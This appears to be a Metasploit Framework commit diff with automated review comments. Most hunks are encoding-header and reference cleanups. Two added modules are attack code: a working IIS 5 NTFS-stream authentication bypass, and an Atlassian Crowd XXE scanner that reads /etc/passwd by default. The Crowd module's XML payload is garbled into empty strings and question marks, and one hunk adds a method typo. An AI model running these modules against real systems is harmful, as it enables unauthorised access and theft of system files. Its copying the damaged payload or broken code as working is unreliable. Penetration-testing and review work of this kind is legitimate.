diff --git a/lib/rex/ui/text/output.rb b/lib/rex/ui/text/output.rb
index 5f3c72c1ae..eb4704cdee 100644
--- a/lib/rex/ui/text/output.rb
+++ b/lib/rex/ui/text/output.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/buffer.rb b/lib/rex/ui/text/output/buffer.rb
index 3d1c04ddda..1252f17a0b 100644
--- a/lib/rex/ui/text/output/buffer.rb
+++ b/lib/rex/ui/text/output/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/file.rb b/lib/rex/ui/text/output/file.rb
index f0a78a7172..867969729f 100644
--- a/lib/rex/ui/text/output/file.rb
+++ b/lib/rex/ui/text/output/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/socket.rb b/lib/rex/ui/text/output/socket.rb
index dea815a871..b43ea08691 100644
--- a/lib/rex/ui/text/output/socket.rb
+++ b/lib/rex/ui/text/output/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/stdio.rb b/lib/rex/ui/text/output/stdio.rb
index 581201b2a3..68494caac9 100644
--- a/lib/rex/ui/text/output/stdio.rb
+++ b/lib/rex/ui/text/output/stdio.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
begin
diff --git a/lib/rex/ui/text/output/tee.rb b/lib/rex/ui/text/output/tee.rb
index be6440a5aa..70f825716b 100644
--- a/lib/rex/ui/text/output/tee.rb
+++ b/lib/rex/ui/text/output/tee.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/progress_tracker.rb b/lib/rex/ui/text/progress_tracker.rb
index bc861754ed..c5520d2493 100644
--- a/lib/rex/ui/text/progress_tracker.rb
+++ b/lib/rex/ui/text/progress_tracker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui/progress_tracker'
module Rex
diff --git a/lib/rex/ui/text/progress_tracker.rb.ut.rb b/lib/rex/ui/text/progress_tracker.rb.ut.rb
index 8ac7109a9c..bef742aac2 100644
--- a/lib/rex/ui/text/progress_tracker.rb.ut.rb
+++ b/lib/rex/ui/text/progress_tracker.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/ui/text/shell.rb b/lib/rex/ui/text/shell.rb
index 7628eed926..840fc3cd09 100644
--- a/lib/rex/ui/text/shell.rb
+++ b/lib/rex/ui/text/shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/table.rb b/lib/rex/ui/text/table.rb
index e1e7d97c5a..0c548a30ea 100644
--- a/lib/rex/ui/text/table.rb
+++ b/lib/rex/ui/text/table.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'rex/socket'
diff --git a/lib/rex/ui/text/table.rb.ut.rb b/lib/rex/ui/text/table.rb.ut.rb
index e36f5627c2..00b63208d1 100644
--- a/lib/rex/ui/text/table.rb.ut.rb
+++ b/lib/rex/ui/text/table.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/zip.rb b/lib/rex/zip.rb
index 890837f19b..495aed8cd7 100644
--- a/lib/rex/zip.rb
+++ b/lib/rex/zip.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Zip library
#
diff --git a/lib/rex/zip/archive.rb b/lib/rex/zip/archive.rb
index 34053b5e5e..0c69769aee 100644
--- a/lib/rex/zip/archive.rb
+++ b/lib/rex/zip/archive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb
index a8c5a8bc22..6774e73869 100644
--- a/lib/rex/zip/blocks.rb
+++ b/lib/rex/zip/blocks.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb
index 0bcfc8f6d5..8248126dcd 100644
--- a/lib/rex/zip/entry.rb
+++ b/lib/rex/zip/entry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
@@ -14,8 +15,8 @@ class Entry
attr_reader :data
def initialize(fname, data, compmeth, timestamp=nil, attrs=nil, xtra=nil, comment=nil)
- @name = fname
- @data = data
+ @name = fname.unpack("C*").pack("C*")
+ @data = data.unpack("C*").pack("C*")
@xtra = xtra
@xtra ||= ''
@comment = comment
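Review bot: The `unpack("C*").pack("C*")` round trip applied to `fname` and `data` in `initialize` carries no comment explaining it, and it builds an Integer array with one element per byte, which is expensive for large entries. It also raises NoMethodError when either argument is nil, where the old plain assignment accepted it; whether any caller passes nil is not visible here. If the intent is to force a binary copy, say so above the two assignments, for example `# copy as a binary (ASCII-8BIT) string, independent of the caller's encoding`. The same applies to the `data=` setter in the next hunk, and `initialize` continues past the end of this one.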
@@ -37,7 +38,7 @@ class Entry
end
def data=(val)
- @data = val
+ @data = val.unpack("C*").pack("C*")
compress
end
@@ -84,11 +85,9 @@ class Entry
# Return the compressed data in a format suitable for adding to an Archive
#
def pack
- ret = ''
-
# - lfh 1
lfh = LocalFileHdr.new(self)
- ret << lfh.pack
+ ret = lfh.pack
# - data 1
if (@compdata)
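Review bot: `ret = lfh.pack` makes `ret` the very string that `LocalFileHdr#pack` returned, where the old code appended it to a fresh `''`. The rest of `pack` is outside this hunk, but it presumably keeps appending to `ret`, which is only safe if `LocalFileHdr#pack` returns a new string on every call. A one-line comment would record that assumption and why the empty-string seed was dropped, for example `# start from the header bytes; LocalFileHdr#pack is expected to return a new binary string`.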
diff --git a/lib/rex/zip/jar.rb b/lib/rex/zip/jar.rb
index b113ec3eaf..cf70acf3ad 100644
--- a/lib/rex/zip/jar.rb
+++ b/lib/rex/zip/jar.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/zip/archive'
diff --git a/lib/rex/zip/samples/comment.rb b/lib/rex/zip/samples/comment.rb
index a879554b00..8bb5295517 100755
--- a/lib/rex/zip/samples/comment.rb
+++ b/lib/rex/zip/samples/comment.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Create a zip file with comments!
diff --git a/lib/rex/zip/samples/mkwar.rb b/lib/rex/zip/samples/mkwar.rb
index 6f7e031f0c..8817a1a51c 100755
--- a/lib/rex/zip/samples/mkwar.rb
+++ b/lib/rex/zip/samples/mkwar.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Create a WAR archive!
diff --git a/lib/rex/zip/samples/mkzip.rb b/lib/rex/zip/samples/mkzip.rb
index a238227f52..a2b288238e 100755
--- a/lib/rex/zip/samples/mkzip.rb
+++ b/lib/rex/zip/samples/mkzip.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Add a file from memory and save it.
diff --git a/lib/rex/zip/samples/recursive.rb b/lib/rex/zip/samples/recursive.rb
index 3079a6cbe5..c05837c69f 100755
--- a/lib/rex/zip/samples/recursive.rb
+++ b/lib/rex/zip/samples/recursive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
msfbase = __FILE__
while File.symlink?(msfbase)
diff --git a/lib/sshkey.rb b/lib/sshkey.rb
index a3bcfa7088..7cc281edc3 100644
--- a/lib/sshkey.rb
+++ b/lib/sshkey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class SSHKey
end
diff --git a/lib/sshkey/lib/sshkey.rb b/lib/sshkey/lib/sshkey.rb
index 147fa4b4cb..6035c10416 100644
--- a/lib/sshkey/lib/sshkey.rb
+++ b/lib/sshkey/lib/sshkey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'openssl'
require 'base64'
require 'digest/md5'
diff --git a/lib/sshkey/lib/sshkey/version.rb b/lib/sshkey/lib/sshkey/version.rb
index f049da0109..398c0e44fb 100644
--- a/lib/sshkey/lib/sshkey/version.rb
+++ b/lib/sshkey/lib/sshkey/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
class SSHKey
VERSION = "1.3.0"
end
diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
index 611862b525..c3588f89b9 100644
--- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
+++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '5798' ],
[ 'BID', '10224' ],
#[ 'CVE', '' ],# No CVE!
- [ 'URL', 'http://www.milw0rm.com/exploits/294' ],
+ [ 'EDB', '294' ]
],
'DisclosureDate' => 'Apr 27 2004'))
diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb
new file mode 100644
index 0000000000..f6bad79e27
--- /dev/null
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb
@@ -0,0 +1,97 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
+ 'Description' => %q{
+ This module bypasses basic authentication for Internet Information Services (IIS).
+ By appending the NTFS stream name to the directory name in a request, it is
+ possible to bypass authentication.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2010-2731' ],
+ [ 'OSVDB', '66160' ],
+ [ 'MSB', 'MS10-065' ],
+ [ 'URL', 'http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
+ ],
+ 'Author' =>
+ [
+ 'Soroush Dalili',
+ 'sinn3r'
+ ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => "Jul 02 2010"
+ ))
+
+ register_options(
+ [
+ OptString.new("TARGETURI", [true, 'The URI directory where basic auth is enabled', '/'])
+ ], self.class)
+ end
+
+
+ def has_auth
+ uri = target_uri.path
+ uri << '/' if uri[-1, 1] != '/'
+
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'GET'
+ })
+ vprint_status(res.body) if res
+
+ return (res and res.code == 401)
+ end
+
+ def try_auth
+ uri = target_uri.path
+ uri << '/' if uri[-1, 1] != '/'
+ uri << Rex::Text.rand_text_alpha(rand(10)+5) + ".#{Rex::Text.rand_text_alpha(3)}"
+
+ dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'
+
+ user = Rex::Text.rand_text_alpha(rand(10) + 5)
+ pass = Rex::Text.rand_text_alpha(rand(10) + 5)
+
+
+ vprint_status("Requesting: #{dir}")
+ res = send_request_cgi({
+ 'uri' => dir,
+ 'method' => 'GET',
+ 'basic_auth' => "#{user}:#{pass}"
+ })
+ vprint_status(res.body) if res
+
+ return (res and res.code != 401 and res.code != 404) ? dir : ''
+ end
+
+ def run
+ @peer = "#{rhost}:#{rport}"
+
+ if not has_auth
+ print_error("#{@peer} - No basic authentication enabled")
+ return
+ end
+
+ bypass_string = try_auth
+
+ if bypass_string.empty?
+ print_error("#{@peer} - The bypass attempt did not work")
+ else
+ print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}")
+ end
+ end
+
+end
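Review bot: `has_auth` returns a falsy value both for a non-401 answer and for a nil result from `send_request_cgi`, so `run` prints "No basic authentication enabled" for a host that simply did not respond. `try_auth` has the mirror problem: every status other than 401 and 404 (a 400, 403, 500 or a redirect included) is reported as a working bypass, which can put a false positive into an assessment report. I would give the nil case its own message in `run` and match the statuses that indicate served content instead of excluding two, for example `return (res and res.code == 200) ? dir : ''` if 200 is what a served directory returns here. `vprint_status(res.body)` also writes the raw, server-controlled body to the operator's console in both methods; `vprint_status("HTTP #{res.code}") if res` is enough for verbose mode.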
diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb
index a5a0504938..11b9d72e43 100644
--- a/modules/auxiliary/dos/http/apache_mod_isapi.rb
+++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb
@@ -66,8 +66,8 @@ class Metasploit3 < Msf::Auxiliary
def run
serverIP = datastore['RHOST']
- if (datastore['RPORT'] != 80)
- serverIP += ":" + datastore['RPORT']
+ if (datastore['RPORT'].o_i != 80)
+ serverIP += ":" + datastore['RPORT'].to_s
end
isapiURI = datastore['ISAPI']
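Review bot: `datastore['RPORT'].o_i` on the new condition line is a typo for `to_i`. Neither String nor Integer defines `o_i`, so `run` raises NoMethodError before anything else happens. The line should read `if (datastore['RPORT'].to_i != 80)`. The `.to_s` added on the next line is fine; `run` continues outside this hunk.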
diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb
index f008820283..8e7407779d 100644
--- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb
+++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '2577' ],
[ 'CVE', '2003-0694' ],
[ 'BID', '8641' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/24' ],
+ [ 'EDB', '24' ]
],
'DisclosureDate' => 'Sep 17 2003'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
index 0e45655dee..75ba28552e 100644
--- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
+++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
@@ -35,8 +35,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '15346' ],
[ 'CVE', '2005-3589' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/1336' ],
- [ 'OSVDB', '20817' ],
+ [ 'EDB', '1336' ],
+ [ 'OSVDB', '20817' ]
],
'DisclosureDate' => 'Nov 07 2005'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
index 459ec33377..f4ffbb1c95 100644
--- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
+++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb
@@ -33,8 +33,8 @@ class Metasploit3 < Msf::Auxiliary
[ 'BID', '21542' ],
[ 'BID', '21549' ],
[ 'CVE', '2006-6565' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/2914' ],
- [ 'OSVDB', '34435' ],
+ [ 'EDB', '2914' ],
+ [ 'OSVDB', '34435' ]
],
'DisclosureDate' => 'Dec 11 2006'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
index 2adcb4e564..a22fbf5b85 100644
--- a/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
+++ b/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-4572' ],
[ 'OSVDB', '49045' ],
- [ 'URL', 'http://milw0rm.com/exploits/6738']
+ [ 'EDB', '6738']
],
'DisclosureDate' => 'Oct 12 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/titan626_site.rb b/modules/auxiliary/dos/windows/ftp/titan626_site.rb
index 87c057f011..76f363880f 100644
--- a/modules/auxiliary/dos/windows/ftp/titan626_site.rb
+++ b/modules/auxiliary/dos/windows/ftp/titan626_site.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-6082'],
[ 'OSVDB', '49177'],
- [ 'URL', 'http://milw0rm.com/exploits/6753']
+ [ 'EDB', '6753']
],
'DisclosureDate' => 'Oct 14 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
index 9e4f3dfe77..0df99d2953 100644
--- a/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
+++ b/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2008-2031' ],
[ 'CVE', '2008-6829' ],
[ 'OSVDB', '44608' ],
- [ 'URL', 'http://milw0rm.com/exploits/6834' ]
+ [ 'EDB', '6834' ]
],
'DisclosureDate' => 'Oct 24 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
index 1e76129465..9c3eca5167 100644
--- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-5666' ],
[ 'OSVDB', '49043' ],
- [ 'URL', 'http://milw0rm.com/exploits/6581' ]
+ [ 'EDB', '6581' ]
],
'DisclosureDate' => 'Sep 26 2008'))
end
diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
index 8cc04ac605..e9b97b3d84 100644
--- a/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-5626'],
[ 'OSVDB', '50837'],
- [ 'URL', 'http://milw0rm.com/exploits/6741' ]
+ [ 'EDB', '6741' ]
],
'DisclosureDate' => 'Oct 13 2008'))
diff --git a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb
index ff4368dcc0..446e5de70f 100644
--- a/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb
+++ b/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
[ 'CVE', '2008-5626'],
[ 'OSVDB', '50837'],
- [ 'URL', 'http://milw0rm.com/exploits/8294' ]
+ [ 'EDB', '8294' ]
],
'DisclosureDate' => 'Mar 27 2009')
)
diff --git a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
index 799ceaedd1..c276f5a10d 100644
--- a/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
+++ b/modules/auxiliary/dos/windows/http/pi3web_isapi.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
[ 'CVE', '2008-6938'],
[ 'OSVDB', '49998'],
- [ 'URL', 'http://milw0rm.com/exploits/7109' ]
+ [ 'EDB', '7109' ]
],
'DisclosureDate' => 'Nov 13 2008'))
diff --git a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
index bbd0a503ee..727ab63f03 100644
--- a/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
+++ b/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb
@@ -150,8 +150,9 @@ class Metasploit3 < Msf::Auxiliary
report_vuln({
:host => rhost,
:port => rport,
- :name => self.fullname,
- :refs => self.references
+ :name => self.name,
+ :refs => self.references,
+ :info => "Module #{self.fullname} successfully crashed the target system via RDP"
})
else
print_status("#{rhost}:#{rport} is still up")
diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb
index 1d9ecc3420..f54a55de71 100644
--- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb
+++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2008-1311'],
[ 'OSVDB', '42932'],
- [ 'URL', 'http://milw0rm.com/exploits/6863']
+ [ 'EDB', '6863']
],
'DisclosureDate' => 'Oct 29 2008'))
diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
index e708ff5671..df27a76719 100644
--- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
+++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb
@@ -1,4 +1,3 @@
-##
# $Id$
##
@@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
@evilchars = ['']
end
- print_status("Connecting to host " + ip + " on port " + datastore['RPORT'])
+ print_status("Connecting to host " + ip + " on port " + datastore['RPORT'].to_s)
if (startstage == 1)
process_phase(1, "Fuzzing without command")
diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb
index c77a6972bd..0ca9e4b3fd 100644
--- a/modules/auxiliary/fuzzers/http/http_form_field.rb
+++ b/modules/auxiliary/fuzzers/http/http_form_field.rb
@@ -97,14 +97,14 @@ class Metasploit3 < Msf::Auxiliary
'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive' => '300',
'Connection' => 'keep-alive',
- 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'],
+ 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
'Content-Type' => 'application/x-www-form-urlencoded',
}
}
@get_data_headers = {
'Host' => host,
'User-Agent' => useragent,
- 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'],
+ 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
}
end
diff --git a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
new file mode 100644
index 0000000000..59a3fc7750
--- /dev/null
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -0,0 +1,152 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
+ 'Version' => '$Revision: $',
+ 'Description' => %q{
+ This module simply attempts to read a remote file from the server using a
+ vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
+ occurs while trying to expand external entities with the SYSTEM identifier. This
+ module has been tested successfully on Linux and Windows installations of Crowd.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2012-2926' ],
+ [ 'OSVDB', '82274' ],
+ [ 'BID', '53595' ],
+ [ 'URL', 'https://www.neg9.org' ], # General
+ [ 'URL', 'https://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17']
+ ],
+ 'Author' =>
+ [
+ 'Will Caput', # Vulnerability discovery and Metasploit module
+ 'Trevor Hartman', # Vulnerability discovery
+ 'Thaddeus Bogner', # Metasploit module
+ 'juan vazquez' # Metasploit module help
+ ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(8095),
+ OptString.new('TARGETURI', [true, 'Path to Crowd', '/crowd/services']),
+ OptString.new('RFILE', [true, 'Remote File', '/etc/passwd'])
+
+ ], self.class)
+
+ register_autofilter_ports([ 8095 ])
+ deregister_options('RHOST')
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ def run_host(ip)
+ res = send_request_cgi({
+ 'uri' => target_uri.to_s,
+ 'method' => 'GET'})
+
+ if not res
+ print_error("#{rhost}:#{rport} Unable to connect")
+ return
+ end
+
+ accessfile(ip)
+ end
+
+ def accessfile(rhost)
+ print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
+
+ soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
+ xmlaut = 'http://authentication.integration.crowd.atlassian.com'
+ xmlsoap = 'http://soap.integration.crowd.atlassian.com'
+ entity = Rex::Text.rand_text_alpha(rand(4) + 4)
+
+ data = " ]>" + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << ''
+ data << "?{entity};"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '?' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+ data << '' + "\r\n"
+
+ res = send_request_cgi({
+ 'uri' => target_uri.to_s,
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => data,
+ 'headers' => {
+ 'SOAPAction' => '""',
+ }}, 60)
+
+ if res and res.code == 500
+ case res.body
+ when /Invalid boolean value: \?(.*)<\/faultstring>/m
+ loot = $1
+ if not loot or loot.empty?
+ print_status("#{rhost}#{rport} Retrieved empty file from #{rhost}:#{rport}")
+ return
+ end
+ f = ::File.basename(datastore['RFILE'])
+ path = store_loot('atlassian.crowd.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
+ print_status("#{rhost}:#{rport} Atlassian Crowd - #{datastore['RFILE']} saved in #{path}")
+ return
+ end
+ end
+
+ print_error("#{rhost}#{rport} Failed to retrieve file from #{rhost}:#{rport}")
+ end
+
+end
+
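Review bot: The two messages in `accessfile` that begin with `#{rhost}#{rport}` print host and port run together with no separator, and then repeat them at the end of the same line. Suggested: `print_status("#{rhost}:#{rport} Retrieved empty file")` and `print_error("#{rhost}:#{rport} Failed to retrieve file")`. The `rhost` parameter of `accessfile` also shadows the `rhost` used in `run_host`, so naming the parameter `ip` would keep the two apart. `loot = $1` depends on global match state; `Regexp.last_match(1)` reads the same capture explicitly.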
diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb
index a7f87975ef..70bfe3f04d 100644
--- a/modules/auxiliary/scanner/http/cisco_device_manager.rb
+++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb
@@ -73,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary
:host => rhost,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "http://#{rhost}:#{rport}/exec/show/version/CR",
+ :name => self.name,
+ :info => "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/exec/show/version/CR",
:refs => self.references,
:exploited_at => Time.now.utc
}
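Review bot: The new `:info` string hard-codes `http://`, so a device reached over SSL is recorded with the wrong scheme, and this hunk adds no `:sname` although the sibling change in cisco_ios_auth_bypass.rb does. Assuming `ssl` is available here as it is in that module, compute `scheme = ssl ? 'https' : 'http'` once and use it for both `:sname => scheme` and `"#{scheme}://#{rhost}:#{rport}/exec/show/version/CR"`. The first hunk of cisco_ios_auth_bypass.rb has the same hard-coded `http://` right next to its new `:sname`. The enclosing hash and method start outside this hunk.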
diff --git a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
index 35e78cf958..80500f00f0 100644
--- a/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
+++ b/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb
@@ -64,8 +64,9 @@ class Metasploit3 < Msf::Auxiliary
:host => rhost,
:port => rport,
:proto => 'tcp',
- :name => self.fullname,
- :info => "http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
+ :name => self.name,
+ :sname => ssl ? "https" : "http",
+ :info => "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
:refs => self.references,
:exploited_at => Time.now.utc
}
@@ -83,8 +84,10 @@ class Metasploit3 < Msf::Auxiliary
report_exploit(
{
:host => rhost,
- :service => rport,
- :name => self.fullname
+ :port => rport,
+ :name => self.name,
+ :sname => ssl ? "https" : "http",
+ :info => "Module #{self.fullname} successfully captured the configuration file:\n#{config}"
}
)
